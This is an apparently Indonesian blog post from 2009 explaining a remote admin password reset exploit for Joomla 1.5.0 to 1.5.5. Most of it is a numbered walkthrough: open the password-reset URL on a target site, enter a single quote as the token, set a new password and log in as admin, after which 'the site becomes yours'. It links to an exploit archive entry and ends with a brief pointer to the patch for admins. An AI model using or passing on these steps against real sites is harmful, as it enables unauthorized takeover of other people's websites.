Tuesday 31 March 2009

Joomla 1.5.x Remote Admin Password Change


Sebuah exploit yang dirilis pertengahan tahun lalu telah membuat para Admin pengguna Joomla harus sedikit cemas. Tidak tanggung-tanggung exploit tersebut mampu mengganti password Admin sang korban. Bagaimana cara kerjanya:
1. Ketikkan alamat:
target.com/index.php?option=com_user&view=reset&layout=confirm

2. Jika diminta token maka masukkan ' (tanda koma atas tunggal)

3. Masukkan password baru 2x

4. Silahkan login di target.com/administrator masukkan username admin (semoga belum
diganti) dan password yang berhasil direset tadi, dan situs tersebut pun jadi
milik Anda.

5.Selengkapnya lihat di http://www.milw0rm.com/exploits/6234. Exploit ini valid untuk Joomla versi 1.50 s/d 1.55

Nah untuk para Admin, silahkan patch situs Anda (ambil patch yang cocok, upload dan ekstract) silahkan lihat patch yang cocok di http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=3883

(dafis/virtual soldier)